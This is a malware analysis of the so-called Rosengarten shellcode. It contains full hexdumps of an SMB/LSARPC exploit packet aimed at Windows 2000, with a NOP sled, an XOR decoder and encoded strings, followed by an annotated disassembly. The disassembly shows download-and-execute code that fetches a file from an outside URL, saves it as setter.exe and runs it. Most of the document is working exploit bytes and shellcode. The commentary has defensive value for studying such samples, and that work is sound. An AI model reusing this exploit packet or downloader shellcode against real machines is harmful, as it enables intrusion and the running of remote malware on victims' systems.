Rosengarten Shellcode

Shellcode

raw

hexdump

00000000  00 00 00 a4 ff 53 4d 42  73 00 00 00 00 18 07 c8  |...€ÿSMBs......È|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 ff fe  |..............ÿþ|
00000020  00 00 10 00 0c ff 00 a4  00 04 11 0a 00 00 00 00  |.....ÿ.€........|
00000030  00 00 00 20 00 00 00 00  00 d4 00 00 80 69 00 4e  |... .....Ô...i.N|
00000040  54 4c 4d 53 53 50 00 01  00 00 00 97 82 08 e0 00  |TLMSSP........à.|
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000060  57 00 69 00 6e 00 64 00  6f 00 77 00 73 00 20 00  |W.i.n.d.o.w.s. .|
00000070  32 00 30 00 30 00 30 00  20 00 32 00 31 00 39 00  |2.0.0.0. .2.1.9.|
00000080  35 00 00 00 57 00 69 00  6e 00 64 00 6f 00 77 00  |5...W.i.n.d.o.w.|
00000090  73 00 20 00 32 00 30 00  30 00 30 00 20 00 35 00  |s. .2.0.0.0. .5.|
000000a0  2e 00 30 00 00 00 00 00  00 00 00 da ff 53 4d 42  |..0........ÚÿSMB|
000000b0  73 00 00 00 00 18 07 c8  00 00 00 00 00 00 00 00  |s......È........|
000000c0  00 00 00 00 00 00 ff fe  00 08 20 00 0c ff 00 da  |......ÿþ.. ..ÿ.Ú|
000000d0  00 04 11 0a 00 00 00 00  00 00 00 57 00 00 00 00  |...........W....|
000000e0  00 d4 00 00 80 9f 00 4e  54 4c 4d 53 53 50 00 03  |.Ô.....NTLMSSP..|
000000f0  00 00 00 01 00 01 00 46  00 00 00 00 00 00 00 47  |.......F.......G|
00000100  00 00 00 00 00 00 00 40  00 00 00 00 00 00 00 40  |.......@.......@|
00000110  00 00 00 06 00 06 00 40  00 00 00 10 00 10 00 47  |.......@.......G|
00000120  00 00 00 15 8a 88 e0 48  00 4f 00 44 00 00 81 19  |......àH.O.D....|
00000130  6a 7a f2 e4 49 1c 28 af  30 25 74 10 67 53 57 00  |jzòäI.(¯0%t.gSW.|
00000140  69 00 6e 00 64 00 6f 00  77 00 73 00 20 00 32 00  |i.n.d.o.w.s. .2.|
00000150  30 00 30 00 30 00 20 00  32 00 31 00 39 00 35 00  |0.0.0. .2.1.9.5.|
00000160  00 00 57 00 69 00 6e 00  64 00 6f 00 77 00 73 00  |..W.i.n.d.o.w.s.|
00000170  20 00 32 00 30 00 30 00  30 00 20 00 35 00 2e 00  | .2.0.0.0. .5...|
00000180  30 00 00 00 00 00 00 00  00 60 ff 53 4d 42 75 00  |0........`ÿSMBu.|
00000190  00 00 00 18 07 c8 00 00  00 00 00 00 00 00 00 00  |.....È..........|
000001a0  00 00 00 00 ff fe 00 08  30 00 04 ff 00 5c 00 08  |....ÿþ..0..ÿ.\..|
000001b0  00 01 00 35 00 00 5c 00  5c 00 31 00 33 00 34 00  |...5..\.\.1.3.4.|
000001c0  2e 00 31 00 33 00 30 00  2e 00 31 00 37 00 34 00  |..1.3.0...1.7.4.|
000001d0  2e 00 31 00 36 00 37 00  5c 00 69 00 70 00 63 00  |..1.6.7.\.i.p.c.|
000001e0  24 00 00 00 3f 3f 3f 3f  3f 00 00 00 00 64 ff 53  |$...?????....dÿS|
000001f0  4d 42 a2 00 00 00 00 18  07 c8 00 00 00 00 00 00  |MB¢......È......|
00000200  00 00 00 00 00 00 00 08  dc 04 00 08 40 00 18 ff  |........Ü...@..ÿ|
00000210  00 de de 00 0e 00 16 00  00 00 00 00 00 00 9f 01  |.ÞÞ.............|
00000220  02 00 00 00 00 00 00 00  00 00 00 00 00 00 03 00  |................|
00000230  00 00 01 00 00 00 40 00  00 00 02 00 00 00 03 11  |......@.........|
00000240  00 00 5c 00 6c 00 73 00  61 00 72 00 70 00 63 00  |..\.l.s.a.r.p.c.|
00000250  00 00 00 00 00 9c ff 53  4d 42 25 00 00 00 00 18  |......ÿSMB%.....|
00000260  07 c8 00 00 00 00 00 00  00 00 00 00 00 00 00 08  |.È..............|
00000270  dc 04 00 08 50 00 10 00  00 48 00 00 00 00 04 00  |Ü...P....H......|
00000280  00 00 00 00 00 00 00 00  00 00 00 54 00 48 00 54  |...........T.H.T|
00000290  00 02 00 26 00 00 40 59  00 10 5c 00 50 00 49 00  |...&..@Y..\.P.I.|
000002a0  50 00 45 00 5c 00 00 00  00 00 05 00 0b 03 10 00  |P.E.\...........|
000002b0  00 00 48 00 00 00 01 00  00 00 b8 10 b8 10 00 00  |..H.......ž.ž...|
000002c0  00 00 01 00 00 00 00 00  01 00 6a 28 19 39 0c b1  |..........j(.9.±|
000002d0  d0 11 9b a8 00 c0 4f d9  2e f5 00 00 00 00 04 5d  |Ð..š.ÀOÙ.õ.....]|
000002e0  88 8a eb 1c c9 11 9f e8  08 00 2b 10 48 60 02 00  |..ë.É..è..+.H`..|
000002f0  00 00 00 00 0c f4 ff 53  4d 42 25 00 00 00 00 18  |.....ôÿSMB%.....|
00000300  07 c8 00 00 00 00 00 00  00 00 00 00 00 00 00 08  |.È..............|
00000310  dc 04 00 08 60 00 10 00  00 a0 0c 00 00 00 04 00  |Ü...`.... ......|
00000320  00 00 00 00 00 00 00 00  00 00 00 54 00 a0 0c 54  |...........T. .T|
00000330  00 02 00 26 00 00 40 b1  0c 10 5c 00 50 00 49 00  |...&..@±..\.P.I.|
00000340  50 00 45 00 5c 00 00 00  00 00 05 00 00 03 10 00  |P.E.\...........|
00000350  00 00 a0 0c 00 00 01 00  00 00 88 0c 00 00 00 00  |.. .............|
00000360  09 00 ec 03 00 00 00 00  00 00 ec 03 00 00 90 90  |..ì.......ì.....|
00000370  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000400  90 90 90 90 90 90 90 90  90 90 90 90 90 90 33 c0  |..............3À|
00000410  f7 d0 8b fc f2 af 57 33  c9 b1 cb 90 90 90 90 80  |÷Ð.üò¯W3ɱË.....|
00000420  37 ff 47 e2 fa 8b ef 4d  5f 57 b8 9e 26 18 88 f7  |7ÿGâú.ïM_Wž.&..÷|
00000430  d0 ff d0 8b d8 be f8 ff  ff ff f7 d6 33 c0 8b c8  |ÐÿÐ.ØŸøÿÿÿ÷Ö3À.È|
00000440  f7 d1 f2 ae 57 53 b8 cd  4c 18 88 f7 d0 ff d0 3e  |÷Ñò®WSžÍL..÷ÐÿÐ>|
00000450  89 44 b5 fd 4e 0b f6 75  e3 33 c0 8b c8 f7 d1 f2  |.DµýN.öuã3À.È÷Ñò|
00000460  ae 57 b8 9e 26 18 88 f7  d0 ff d0 8b d8 be f5 ff  |®Wž.&..÷ÐÿÐ.ØŸõÿ|
00000470  ff ff f7 d6 ba f8 ff ff  ff f7 d2 52 33 c0 8b c8  |ÿÿ÷Öºøÿÿÿ÷ÒR3À.È|
00000480  f7 d1 f2 ae 57 53 b8 cd  4c 18 88 f7 d0 ff d0 3e  |÷Ñò®WSžÍL..÷ÐÿÐ>|
00000490  89 44 b5 fd 5a 52 4e 3b  f2 75 e1 33 c0 8b c8 f7  |.DµýZRN;òuá3À.È÷|
000004a0  d1 f2 ae 90 90 33 c0 66  48 d1 e0 33 d2 50 52 ff  |Ñò®..3ÀfHÑà3ÒPRÿ|
000004b0  55 01 8b f0 33 d2 52 52  52 52 57 ff 55 25 33 d2  |U..ð3ÒRRRRWÿU%3Ò|
000004c0  52 52 52 52 8b d7 90 90  90 52 50 ff 55 21 57 33  |RRRR.×...RPÿU!W3|
000004d0  d2 66 4a d1 e2 52 56 50  ff 55 1d 90 90 90 33 d2  |ÒfJÑâRVPÿU....3Ò|
000004e0  52 b8 f4 ff ff ff f7 d0  8b d5 2b d0 42 90 90 52  |Ržôÿÿÿ÷Ð.Õ+ÐB..R|
000004f0  ff 55 19 ff 37 56 50 8b  d8 ff 55 15 53 ff 55 11  |ÿU.ÿ7VP.ØÿU.SÿU.|
00000500  90 90 90 90 90 33 d2 42  52 b8 f4 ff ff ff f7 d0  |.....3ÒBRžôÿÿÿ÷Ð|
00000510  8b d5 2b d0 42 90 90 90  52 ff 55 09 90 ff 55 05  |.Õ+ÐB...RÿU..ÿU.|
00000520  90 ff ff ff ff b4 ba ad  b1 ba b3 cc cd d1 bb b3  |.ÿÿÿÿŽº­±º³ÌÍÑ»³|
00000530  b3 ff a0 93 9c 8d 9a 9e  8b ff a0 93 88 8d 96 8b  |³ÿ ......ÿ .....|
00000540  9a ff a0 93 9c 93 90 8c  9a ff a0 93 9c 93 90 8c  |.ÿ ......ÿ .....|
00000550  9a ff a8 96 91 ba 87 9a  9c ff ba 87 96 8b af 8d  |.ÿš..º...ÿº...¯.|
00000560  90 9c 9a 8c 8c ff b8 93  90 9d 9e 93 be 93 93 90  |.....ÿž.....Ÿ...|
00000570  9c ff a8 b6 b1 b6 b1 ba  ab d1 bb b3 b3 ff b6 91  |.ÿš¶±¶±º«Ñ»³³ÿ¶.|
00000580  8b 9a 8d 91 9a 8b b0 8f  9a 91 be ff b6 91 8b 9a  |......°...Ÿÿ¶...|
00000590  8d 91 9a 8b b0 8f 9a 91  aa 8d 93 be ff b6 91 8b  |....°...ª..Ÿÿ¶..|
000005a0  9a 8d 91 9a 8b ad 9a 9e  9b b9 96 93 9a ff 97 8b  |.....­...¹...ÿ..|
000005b0  8b 8f c5 d0 d0 8c 9c d1  89 96 8d 8b 8a 9e 93 98  |..ÅÐÐ..Ñ........|
000005c0  9e 92 9a 85 d2 85 90 91  9a d1 9c 90 92 d0 9c 98  |....Ò....Ñ...Ð..|
000005d0  96 d2 9d 96 91 d0 9c 98  96 a0 8f 8d 90 87 86 c0  |.Ò...Ð... .....À|
000005e0  93 9b 8d cd ff 8c 9a 8b  8b 9a 8d d1 9a 87 9a ff  |...Íÿ......Ñ...ÿ|
000005f0  88 88 88 88 88 88 88 88  88 88 88 88 88 88 88 88  |................|
*
00000610  88 88 88 88 88 88 88 88  ff 90 90 90 90 90 90 90  |........ÿ.......|
00000620  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000b10  90 90 90 90 90 90 90 90  90 90 cc 59 fb 77 90 90  |..........ÌYûw..|
00000b20  90 90 90 90 90 90 90 90  90 90 66 81 ec 1c 07 ff  |..........f.ì..ÿ|
00000b30  e4 90 90 90 90 90 90 90  90 90 90 90 90 90 95 14  |ä...............|
00000b40  40 00 03 00 00 00 7c 70  40 00 01 00 00 00 00 00  |@.....|p@.......|
00000b50  00 00 01 00 00 00 00 00  00 00 01 00 00 00 00 00  |................|
*
00000b80  00 00 01 00 00 00 00 00  00 00 7c 70 40 00 01 00  |..........|p@...|
00000b90  00 00 00 00 00 00 01 00  00 00 00 00 00 00 7c 70  |..............|p|
00000ba0  40 00 01 00 00 00 00 00  00 00 01 00 00 00 00 00  |@...............|
00000bb0  00 00 7c 70 40 00 01 00  00 00 00 00 00 00 01 00  |..|p@...........|
00000bc0  00 00 00 00 00 00 78 85  13 00 ab 5b a6 e9 31 31  |......x...«[Šé11|
00000bd0  31 31 31 31 31 31 31 31  31 31 31 31 31 31 31 31  |1111111111111111|
*
00000fe0  31 31 31 31 31 31 31 31  31 00                    |111111111.|
00000fea

unxor'd

00000000  00 00 00 a4 ff 53 4d 42  73 00 00 00 00 18 07 c8  |...€ÿSMBs......È|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 ff fe  |..............ÿþ|
00000020  00 00 10 00 0c ff 00 a4  00 04 11 0a 00 00 00 00  |.....ÿ.€........|
00000030  00 00 00 20 00 00 00 00  00 d4 00 00 80 69 00 4e  |... .....Ô...i.N|
00000040  54 4c 4d 53 53 50 00 01  00 00 00 97 82 08 e0 00  |TLMSSP........à.|
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000060  57 00 69 00 6e 00 64 00  6f 00 77 00 73 00 20 00  |W.i.n.d.o.w.s. .|
00000070  32 00 30 00 30 00 30 00  20 00 32 00 31 00 39 00  |2.0.0.0. .2.1.9.|
00000080  35 00 00 00 57 00 69 00  6e 00 64 00 6f 00 77 00  |5...W.i.n.d.o.w.|
00000090  73 00 20 00 32 00 30 00  30 00 30 00 20 00 35 00  |s. .2.0.0.0. .5.|
000000a0  2e 00 30 00 00 00 00 00  00 00 00 da ff 53 4d 42  |..0........ÚÿSMB|
000000b0  73 00 00 00 00 18 07 c8  00 00 00 00 00 00 00 00  |s......È........|
000000c0  00 00 00 00 00 00 ff fe  00 08 20 00 0c ff 00 da  |......ÿþ.. ..ÿ.Ú|
000000d0  00 04 11 0a 00 00 00 00  00 00 00 57 00 00 00 00  |...........W....|
000000e0  00 d4 00 00 80 9f 00 4e  54 4c 4d 53 53 50 00 03  |.Ô.....NTLMSSP..|
000000f0  00 00 00 01 00 01 00 46  00 00 00 00 00 00 00 47  |.......F.......G|
00000100  00 00 00 00 00 00 00 40  00 00 00 00 00 00 00 40  |.......@.......@|
00000110  00 00 00 06 00 06 00 40  00 00 00 10 00 10 00 47  |.......@.......G|
00000120  00 00 00 15 8a 88 e0 48  00 4f 00 44 00 00 81 19  |......àH.O.D....|
00000130  6a 7a f2 e4 49 1c 28 af  30 25 74 10 67 53 57 00  |jzòäI.(¯0%t.gSW.|
00000140  69 00 6e 00 64 00 6f 00  77 00 73 00 20 00 32 00  |i.n.d.o.w.s. .2.|
00000150  30 00 30 00 30 00 20 00  32 00 31 00 39 00 35 00  |0.0.0. .2.1.9.5.|
00000160  00 00 57 00 69 00 6e 00  64 00 6f 00 77 00 73 00  |..W.i.n.d.o.w.s.|
00000170  20 00 32 00 30 00 30 00  30 00 20 00 35 00 2e 00  | .2.0.0.0. .5...|
00000180  30 00 00 00 00 00 00 00  00 60 ff 53 4d 42 75 00  |0........`ÿSMBu.|
00000190  00 00 00 18 07 c8 00 00  00 00 00 00 00 00 00 00  |.....È..........|
000001a0  00 00 00 00 ff fe 00 08  30 00 04 ff 00 5c 00 08  |....ÿþ..0..ÿ.\..|
000001b0  00 01 00 35 00 00 5c 00  5c 00 31 00 33 00 34 00  |...5..\.\.1.3.4.|
000001c0  2e 00 31 00 33 00 30 00  2e 00 31 00 37 00 34 00  |..1.3.0...1.7.4.|
000001d0  2e 00 31 00 36 00 37 00  5c 00 69 00 70 00 63 00  |..1.6.7.\.i.p.c.|
000001e0  24 00 00 00 3f 3f 3f 3f  3f 00 00 00 00 64 ff 53  |$...?????....dÿS|
000001f0  4d 42 a2 00 00 00 00 18  07 c8 00 00 00 00 00 00  |MB¢......È......|
00000200  00 00 00 00 00 00 00 08  dc 04 00 08 40 00 18 ff  |........Ü...@..ÿ|
00000210  00 de de 00 0e 00 16 00  00 00 00 00 00 00 9f 01  |.ÞÞ.............|
00000220  02 00 00 00 00 00 00 00  00 00 00 00 00 00 03 00  |................|
00000230  00 00 01 00 00 00 40 00  00 00 02 00 00 00 03 11  |......@.........|
00000240  00 00 5c 00 6c 00 73 00  61 00 72 00 70 00 63 00  |..\.l.s.a.r.p.c.|
00000250  00 00 00 00 00 9c ff 53  4d 42 25 00 00 00 00 18  |......ÿSMB%.....|
00000260  07 c8 00 00 00 00 00 00  00 00 00 00 00 00 00 08  |.È..............|
00000270  dc 04 00 08 50 00 10 00  00 48 00 00 00 00 04 00  |Ü...P....H......|
00000280  00 00 00 00 00 00 00 00  00 00 00 54 00 48 00 54  |...........T.H.T|
00000290  00 02 00 26 00 00 40 59  00 10 5c 00 50 00 49 00  |...&..@Y..\.P.I.|
000002a0  50 00 45 00 5c 00 00 00  00 00 05 00 0b 03 10 00  |P.E.\...........|
000002b0  00 00 48 00 00 00 01 00  00 00 b8 10 b8 10 00 00  |..H.......ž.ž...|
000002c0  00 00 01 00 00 00 00 00  01 00 6a 28 19 39 0c b1  |..........j(.9.±|
000002d0  d0 11 9b a8 00 c0 4f d9  2e f5 00 00 00 00 04 5d  |Ð..š.ÀOÙ.õ.....]|
000002e0  88 8a eb 1c c9 11 9f e8  08 00 2b 10 48 60 02 00  |..ë.É..è..+.H`..|
000002f0  00 00 00 00 0c f4 ff 53  4d 42 25 00 00 00 00 18  |.....ôÿSMB%.....|
00000300  07 c8 00 00 00 00 00 00  00 00 00 00 00 00 00 08  |.È..............|
00000310  dc 04 00 08 60 00 10 00  00 a0 0c 00 00 00 04 00  |Ü...`.... ......|
00000320  00 00 00 00 00 00 00 00  00 00 00 54 00 a0 0c 54  |...........T. .T|
00000330  00 02 00 26 00 00 40 b1  0c 10 5c 00 50 00 49 00  |...&..@±..\.P.I.|
00000340  50 00 45 00 5c 00 00 00  00 00 05 00 00 03 10 00  |P.E.\...........|
00000350  00 00 a0 0c 00 00 01 00  00 00 88 0c 00 00 00 00  |.. .............|
00000360  09 00 ec 03 00 00 00 00  00 00 ec 03 00 00 90 90  |..ì.......ì.....|
00000370  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000520  90 90 90 90 90 4b 45 52  4e 45 4c 33 32 2e 44 4c  |.....KERNEL32.DL|
00000530  4c 00 5f 6c 63 72 65 61  74 00 5f 6c 77 72 69 74  |L._lcreat._lwrit|
00000540  65 00 5f 6c 63 6c 6f 73  65 00 5f 6c 63 6c 6f 73  |e._lclose._lclos|
00000550  65 00 57 69 6e 45 78 65  63 00 45 78 69 74 50 72  |e.WinExec.ExitPr|
00000560  6f 63 65 73 73 00 47 6c  6f 62 61 6c 41 6c 6c 6f  |ocess.GlobalAllo|
00000570  63 00 57 49 4e 49 4e 45  54 2e 44 4c 4c 00 49 6e  |c.WININET.DLL.In|
00000580  74 65 72 6e 65 74 4f 70  65 6e 41 00 49 6e 74 65  |ternetOpenA.Inte|
00000590  72 6e 65 74 4f 70 65 6e  55 72 6c 41 00 49 6e 74  |rnetOpenUrlA.Int|
000005a0  65 72 6e 65 74 52 65 61  64 46 69 6c 65 00 68 74  |ernetReadFile.ht|
000005b0  74 70 3a 2f 2f 73 63 2e  76 69 72 74 75 61 6c 67  |tp://sc.virtualg|
000005c0  61 6d 65 7a 2d 7a 6f 6e  65 2e 63 6f 6d 2f 63 67  |amez-zone.com/cg|
000005d0  69 2d 62 69 6e 2f 63 67  69 5f 70 72 6f 78 79 3f  |i-bin/cgi_proxy?|
000005e0  6c 64 72 32 00 73 65 74  74 65 72 2e 65 78 65 00  |ldr2.setter.exe.|
000005f0  88 88 88 88 88 88 88 88  88 88 88 88 88 88 88 88  |................|
*
00000610  88 88 88 88 88 88 88 88  ff 90 90 90 90 90 90 90  |........ÿ.......|
00000620  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000b10  90 90 90 90 90 90 90 90  90 90 cc 59 fb 77 90 90  |..........ÌYûw..|
00000b20  90 90 90 90 90 90 90 90  90 90 66 81 ec 1c 07 ff  |..........f.ì..ÿ|
00000b30  e4 90 90 90 90 90 90 90  90 90 90 90 90 90 95 14  |ä...............|
00000b40  40 00 03 00 00 00 7c 70  40 00 01 00 00 00 00 00  |@.....|p@.......|
00000b50  00 00 01 00 00 00 00 00  00 00 01 00 00 00 00 00  |................|
*
00000b80  00 00 01 00 00 00 00 00  00 00 7c 70 40 00 01 00  |..........|p@...|
00000b90  00 00 00 00 00 00 01 00  00 00 00 00 00 00 7c 70  |..............|p|
00000ba0  40 00 01 00 00 00 00 00  00 00 01 00 00 00 00 00  |@...............|
00000bb0  00 00 7c 70 40 00 01 00  00 00 00 00 00 00 01 00  |..|p@...........|
00000bc0  00 00 00 00 00 00 78 85  13 00 ab 5b a6 e9 31 31  |......x...«[Šé11|
00000bd0  31 31 31 31 31 31 31 31  31 31 31 31 31 31 31 31  |1111111111111111|
*
00000fe0  31 31 31 31 31 31 31 31  31 00                    |111111111.|
00000fea

Analysis

XOR decoder "rosengarten data only xor"

;-----------------------------------------------------------------------
; Stage 1: XOR decoder (IDA listing, x86-32, Intel syntax).
; Finds the 0FFFFFFFFh marker dword that sits just before the encoded
; string table and decodes the 0CBh (203) bytes after it in place with
; XOR 0FFh (a bytewise NOT).  On exit edi = 5F0h (first byte after the
; strings) and the address of the decoded strings (525h) has been left
; on the stack for stage 2.
; Register use: eax = value searched for, edi = scan/decode cursor,
; ecx = byte counter for the decode loop.
;-----------------------------------------------------------------------
0000040E                 xor     eax, eax
00000410                 not     eax             ; eax = 0FFFFFFFFh, the marker value
00000412                 mov     edi, esp        ; scan starts at the current stack pointer; the decoder assumes it is executing from the stack
00000414                 repne scasd             ; search for 0xFFFFFFFF in shellcode
                                                 ; NOTE(review): ecx is not initialised in the visible code before this scan, so
                                                 ; the scan bound is whatever ecx held on entry.  scasd steps 4 bytes at a time, so the
                                                 ; marker at 521h is only hit if the start address has the matching alignment (cannot be
                                                 ; confirmed from the listing alone).
00000416                 push    edi             ; edi = one past the marker = 525h, start of the encoded strings; saved for stage 2
00000417                 xor     ecx, ecx
00000419                 mov     cl, 0CBh ; '-'  ; 203 bytes = 525h..5EFh, exactly the string table (not the dword table after it)
0000041B                 nop
0000041C                 nop
0000041D                 nop
0000041E                 nop
0000041F
0000041F loc_41F:                                ; decode loop: *edi++ ^= 0FFh, ecx times
0000041F                 xor     byte ptr [edi], 0FFh
00000422                 inc     edi
00000423                 loop    loc_41F         ; ecx--; repeat while ecx != 0

Shellcode with unxor'd data

;-----------------------------------------------------------------------
; Stage 2: payload.  Entered with edi = 5F0h (end of the decoded strings)
; and the string-table start (525h) on top of the stack.
; 1. Resolves 7 kernel32 and 3 wininet exports by name into the dword
;    table at 5F0h..617h (the 88888888h placeholders below).
; 2. GlobalAlloc's a 131070-byte buffer, fetches the URL at 5AEh over
;    HTTP into it, writes the buffer to setter.exe, WinExec's it, exits.
; Register roles: ebp = table base - 1 (5EFh), so [ebp+1]..[ebp+25h]
; address the ten slots; edi = cursor over the NUL-terminated strings;
; ebx = module handle for the current GetProcAddress loop, later the
; HFILE; esi = slot index, later the download buffer.
; Defensive reading: LoadLibraryA and GetProcAddress are called through
; absolute addresses (77E7D961h / 77E7B332h, stored bitwise-inverted in
; the immediates), so the sample depends on a kernel32 build where those
; exports sit at exactly those addresses.  No return value is checked at
; any call site.
;-----------------------------------------------------------------------
00000425                 mov     ebp, edi        ; edi = 5F0h after the decoder
00000427                 dec     ebp             ; ebp = 5EFh; [ebp+1] is the first table slot (GlobalAlloc)
00000428                 pop     edi             ; edi = 525h = "KERNEL32.DLL", pushed by the decoder
00000429                 push    edi             ; arg: lpLibFileName
0000042A                 mov     eax, 8818269Eh
0000042F                 not     eax             ; 77E7D961 = LoadLibraryA
00000431                 call    eax             ; LoadLibraryA("KERNEL32.DLL")
00000433                 mov     ebx, eax        ; ebx = hKernel32
00000435                 mov     esi, 0FFFFFFF8h
0000043A                 not     esi             ; esi = 7: number of kernel32 names, also the starting slot index
0000043C
0000043C loc_43C:                                ; resolve loop 1: seven kernel32 exports, slots 608h down to 5F0h
0000043C                 xor     eax, eax        ; al = 0, the byte scasb looks for
0000043E                 mov     ecx, eax
00000440                 not     ecx             ; ecx = -1: effectively unbounded scan
00000442                 repne scasb             ; advance edi past the current string's NUL to the next name
00000444                 push    edi             ; arg 2: lpProcName
00000445                 push    ebx             ; arg 1: hModule
00000446                 mov     eax, 88184CCDh
0000044B                 not     eax             ; 77E7B332 = GetProcAddress
0000044D                 call    eax             ; eax = resolved address (0 on failure, unchecked)
0000044F                 mov     ds:[ebp+esi*4-3], eax ; slot = 5EFh + esi*4 - 3: esi=7 -> 608h _lcreat, 6 -> 604h _lwrite, 5 -> 600h _lclose,
                                                 ; 4 -> 5FCh _lclose_0, 3 -> 5F8h WinExec, 2 -> 5F4h ExitProcess, 1 -> 5F0h GlobalAlloc
00000454                 dec     esi
00000455                 or      esi, esi
00000457                 jnz     short loc_43C   ; loop until esi reaches 0
00000459                 xor     eax, eax
0000045B                 mov     ecx, eax
0000045D                 not     ecx
0000045F                 repne scasb             ; skip past "GlobalAlloc" -> edi = 572h "WININET.DLL"
00000461                 push    edi             ; arg: lpLibFileName
00000462                 mov     eax, 8818269Eh
00000467                 not     eax             ; 77E7D961 = LoadLibraryA
00000469                 call    eax             ; LoadLibraryA("WININET.DLL")
0000046B                 mov     ebx, eax        ; ebx = hWininet
0000046D                 mov     esi, 0FFFFFFF5h
00000472                 not     esi             ; esi = 0Ah: slot index of InternetOpenA (614h)
00000474                 mov     edx, 0FFFFFFF8h
00000479                 not     edx             ; edx = 7: loop stop value
0000047B                 push    edx             ; park the stop value on the stack across the calls (edx is caller-saved)
0000047C
0000047C loc_47C:                                ; resolve loop 2: three wininet exports, esi = 10, 9, 8
0000047C                 xor     eax, eax
0000047E                 mov     ecx, eax
00000480                 not     ecx
00000482                 repne scasb             ; next name
00000484                 push    edi             ; arg 2: lpProcName
00000485                 push    ebx             ; arg 1: hModule
00000486                 mov     eax, 88184CCDh
0000048B                 not     eax             ; 77E7B332 = GetProcAddress
0000048D                 call    eax
0000048F                 mov     ds:[ebp+esi*4-3], eax ; esi=10 -> 614h InternetOpenA, 9 -> 610h InternetOpenURLA, 8 -> 60Ch InternetReadFile
00000494                 pop     edx             ; reload the stop value
00000495                 push    edx             ; ... and keep it; this dword is never popped again (see ExitProcess below)
00000496                 dec     esi
00000497                 cmp     esi, edx
00000499                 jnz     short loc_47C   ; stop once esi == 7
0000049B                 xor     eax, eax
0000049D                 mov     ecx, eax
0000049F                 not     ecx
000004A1                 repne scasb             ; skip past "InternetReadFile" -> edi = 5AEh, the URL string
000004A3                 nop
000004A4                 nop
000004A5                 xor     eax, eax
000004A7                 dec     ax              ; eax = 0FFFFh
000004A9                 shl     eax, 1          ; eax = 1FFFEh = 131070: download buffer size
000004AB                 xor     edx, edx
000004AD                 push    eax             ; 131070 = dwBytes
000004AE                 push    edx             ; uFlags = 0
000004AF                 call    dword ptr [ebp+1] ; GlobalAlloc(0, 131070)
000004B2                 mov     esi, eax        ; esi = download buffer (NULL on failure, unchecked)
000004B4                 xor     edx, edx
000004B6                 push    edx             ; dwFlags = 0
000004B7                 push    edx             ; lpszProxyBypass = 0
000004B8                 push    edx             ; lpszProxy = 0
000004B9                 push    edx             ; dwAccessType = 0
000004BA                 push    edi             ; edi points to aHttpSc_virtual
000004BA                                         ; here used as agent (lpszAgent)
000004BA                                         ; and as URL for InternetOpenURLA
000004BB                 call    dword ptr [ebp+25h] ; InternetOpenA -> eax = hInternet
000004BE                 xor     edx, edx
000004C0                 push    edx             ; dwContext = 0
000004C1                 push    edx             ; dwFlags = 0
000004C2                 push    edx             ; dwHeadersLength = 0
000004C3                 push    edx             ; lpszHeaders = 0
000004C4                 mov     edx, edi
000004C6                 nop
000004C7                 nop
000004C8                 nop
000004C9                 push    edx             ; lpszUrl = the URL string at 5AEh
000004CA                 push    eax             ; hInternet (unchecked)
000004CB                 call    dword ptr [ebp+21h] ; InternetOpenURLA -> eax = hFile
000004CE                 push    edi             ; lpdwNumberOfBytesRead: the first 4 bytes of the URL string are reused as scratch
000004CF                 xor     edx, edx
000004D1                 dec     dx
000004D3                 shl     edx, 1          ; edx = 1FFFEh = dwNumberOfBytesToRead, same as the buffer size
000004D5                 push    edx
000004D6                 push    esi             ; lpBuffer = download buffer
000004D7                 push    eax             ; hFile (unchecked)
000004D8                 call    dword ptr [ebp+1Dh] ; InternetReadFile
                                                 ; a single read: no loop for a short read, no return-value check
000004DB                 nop
000004DC                 nop
000004DD                 nop
000004DE                 xor     edx, edx
000004E0                 push    edx             ; iAttribute = 0
000004E1                 mov     eax, 0FFFFFFF4h
000004E6                 not     eax             ; eax = 0Bh
000004E8                 mov     edx, ebp
000004EA                 sub     edx, eax
000004EC                 inc     edx             ; ebp-B+1 = 5E5 = offset of aSetter_exe
000004ED                 nop
000004EE                 nop
000004EF                 push    edx             ; lpPathName = "setter.exe"
000004F0                 call    dword ptr [ebp+19h] ; _lcreat: create setter.exe (the write is the next call) -> eax = HFILE
000004F3                 push    dword ptr [edi] ; cbWrite = byte count InternetReadFile stored over the URL string
000004F5                 push    esi             ; lpBuffer = download buffer
000004F6                 push    eax             ; hFile from _lcreat
000004F7                 mov     ebx, eax        ; keep the HFILE for _lclose
000004F9                 call    dword ptr [ebp+15h] ; _lwrite
000004FC                 push    ebx
000004FD                 call    dword ptr [ebp+11h] ; _lclose (the second slot, 5FCh/[ebp+0Dh], is resolved but never called)
00000500                 nop
00000501                 nop
00000502                 nop
00000503                 nop
00000504                 nop
00000505                 xor     edx, edx
00000507                 inc     edx
00000508                 push    edx             ; uCmdShow = 1
00000509                 mov     eax, 0FFFFFFF4h
0000050E                 not     eax
00000510                 mov     edx, ebp
00000512                 sub     edx, eax
00000514                 inc     edx             ; edx = 5E5h = aSetter_exe again
00000515                 nop
00000516                 nop
00000517                 nop
00000518                 push    edx             ; lpCmdLine = "setter.exe"
00000519                 call    dword ptr [ebp+9] ; execute setter.exe (WinExec)
0000051C                 nop
0000051D                 call    dword ptr [ebp+5] ; ExitProcess
                                                 ; no uExitCode is pushed; it reads whatever is at [esp], presumably the stop
                                                 ; value (7) parked at 47Bh/495h, assuming every call above was stdcall-balanced
00000520                 nop
00000520 ; ---------------------------------------------------------------------------
00000521                 dd FFFFFFFFh              ; This is the FFFFFFFFh the decoder is looking for
; --- string table 525h..5EFh: stored XOR 0FFh in the raw sample, decoded in place by stage 1.
; --- Order matters: it is walked sequentially with repne scasb and maps onto the slots below.
00000525 aKernel32_dll   db 'KERNEL32.DLL',0     ; LoadLibraryA argument (loop 1 module)
00000532 a_lcreat        db '_lcreat',0          ; -> slot 608h
0000053A a_lwrite        db '_lwrite',0          ; -> slot 604h
00000542 a_lclose        db '_lclose',0          ; -> slot 600h
0000054A a_lclose_0      db '_lclose',0          ; -> slot 5FCh (duplicate, unused)
00000552 aWinexec        db 'WinExec',0          ; -> slot 5F8h
0000055A aExitprocess    db 'ExitProcess',0      ; -> slot 5F4h
